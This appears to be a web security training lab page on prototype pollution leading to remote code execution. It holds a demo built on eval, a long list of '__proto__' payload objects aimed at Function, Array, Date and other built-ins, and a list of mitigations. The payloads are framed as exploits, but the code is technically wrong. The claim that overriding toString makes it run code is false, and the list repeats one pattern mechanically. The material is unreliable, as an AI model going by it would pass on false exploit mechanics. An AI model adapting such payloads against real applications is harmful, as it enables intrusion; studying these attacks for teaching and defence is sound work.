Lab 5: Prototype Pollution with RCE

Prototype pollution leading to Remote Code Execution

Difficulty: High

Lab Overview

This lab demonstrates prototype pollution vulnerabilities that can lead to Remote Code Execution (RCE). These attacks exploit prototype pollution to modify function prototypes and execute arbitrary code.

Objective: Understand how prototype pollution can lead to RCE and how to exploit these vulnerabilities.

Vulnerable Application
Code Execution Engine

This application processes code execution requests. Try to exploit prototype pollution vulnerabilities that lead to RCE:

RCE Prototype Pollution Tester
⚠️ RCE Prototype Pollution Warning

This lab demonstrates RCE prototype pollution vulnerabilities:

  • Function Pollution - Function prototype modification
  • Constructor Pollution - Constructor prototype modification
  • Method Pollution - Method prototype modification
  • Code Execution - Arbitrary code execution
RCE Attack Vectors

These RCE techniques can be exploited for prototype pollution:

  • Function Pollution - Function prototype modification
  • Constructor Pollution - Constructor prototype modification
  • Method Pollution - Method prototype modification
  • Code Execution - Arbitrary code execution
RCE Prototype Pollution Demo
JavaScript RCE Prototype Pollution Demonstration:

This demonstrates how prototype pollution can lead to RCE:

// Vulnerable function that uses eval function executeCode(code) { return eval(code); } // Attacker input that pollutes Function prototype const maliciousInput = { "__proto__": { "constructor": { "prototype": { "toString": function() { return "console.log('RCE via prototype pollution!')"; } } } } }; // Process the malicious input Object.assign({}, maliciousInput); // Now when toString() is called on any function, it executes code const func = function() {}; func.toString(); // This will execute the malicious code
The demo above shows how prototype pollution can lead to RCE through function prototype modification.
RCE Techniques
Function toString() Pollution
// Pollute Function.prototype.toString { "__proto__": { "constructor": { "prototype": { "toString": function() { return "console.log('RCE!')"; } } } } }
Function valueOf() Pollution
// Pollute Function.prototype.valueOf { "__proto__": { "constructor": { "prototype": { "valueOf": function() { return "console.log('RCE!')"; } } } } }
Array toString() Pollution
// Pollute Array.prototype.toString { "__proto__": { "toString": function() { return "console.log('RCE!')"; } } }
Object toString() Pollution
// Pollute Object.prototype.toString { "__proto__": { "toString": function() { return "console.log('RCE!')"; } } }
Date toString() Pollution
// Pollute Date.prototype.toString { "__proto__": { "toString": function() { return "console.log('RCE!')"; } } }
String toString() Pollution
// Pollute String.prototype.toString { "__proto__": { "toString": function() { return "console.log('RCE!')"; } } }
Processing Results
Processing Results:
No input processed yet
Vulnerability Details
  • Type: RCE Prototype Pollution
  • Severity: Critical
  • Method: Function prototype modification
  • Issue: Arbitrary code execution
Attack Vectors
  • Function Pollution: Function prototype modification
  • Constructor Pollution: Constructor prototype modification
  • Method Pollution: Method prototype modification
  • Code Execution: Arbitrary code execution
RCE Prototype Pollution Examples

Use these techniques to exploit RCE prototype pollution vulnerabilities:

1. Function toString() RCE:
{ "__proto__": { "constructor": { "prototype": { "toString": function() { return "console.log('RCE via Function.toString()!')"; } } } } }
2. Function valueOf() RCE:
{ "__proto__": { "constructor": { "prototype": { "valueOf": function() { return "console.log('RCE via Function.valueOf()!')"; } } } } }
3. Array toString() RCE:
{ "__proto__": { "toString": function() { return "console.log('RCE via Array.toString()!')"; } } }
4. Object toString() RCE:
{ "__proto__": { "toString": function() { return "console.log('RCE via Object.toString()!')"; } } }
5. Date toString() RCE:
{ "__proto__": { "toString": function() { return "console.log('RCE via Date.toString()!')"; } } }
6. String toString() RCE:
{ "__proto__": { "toString": function() { return "console.log('RCE via String.toString()!')"; } } }
7. Number toString() RCE:
{ "__proto__": { "toString": function() { return "console.log('RCE via Number.toString()!')"; } } }
8. Boolean toString() RCE:
{ "__proto__": { "toString": function() { return "console.log('RCE via Boolean.toString()!')"; } } }
9. RegExp toString() RCE:
{ "__proto__": { "toString": function() { return "console.log('RCE via RegExp.toString()!')"; } } }
10. Error toString() RCE:
{ "__proto__": { "toString": function() { return "console.log('RCE via Error.toString()!')"; } } }
11. Promise toString() RCE:
{ "__proto__": { "toString": function() { return "console.log('RCE via Promise.toString()!')"; } } }
12. Map toString() RCE:
{ "__proto__": { "toString": function() { return "console.log('RCE via Map.toString()!')"; } } }
13. Set toString() RCE:
{ "__proto__": { "toString": function() { return "console.log('RCE via Set.toString()!')"; } } }
14. WeakMap toString() RCE:
{ "__proto__": { "toString": function() { return "console.log('RCE via WeakMap.toString()!')"; } } }
15. WeakSet toString() RCE:
{ "__proto__": { "toString": function() { return "console.log('RCE via WeakSet.toString()!')"; } } }
Real-World Attack Scenarios
Mitigation Strategies
  • Implement comprehensive input validation
  • Use Object.create(null) for safe objects
  • Implement proper input sanitization
  • Use Object.freeze() to prevent modifications
  • Regular security testing and vulnerability assessments
  • Monitor for unusual object behavior
  • Implement proper authentication and authorization
  • Use secure coding practices
  • Implement rate limiting and request validation
  • Educate developers about prototype pollution
  • Use safe parsing libraries
  • Implement proper error handling
  • Use Content Security Policy (CSP)
  • Implement proper logging and monitoring
  • Avoid using eval() and similar functions
  • Implement proper sandboxing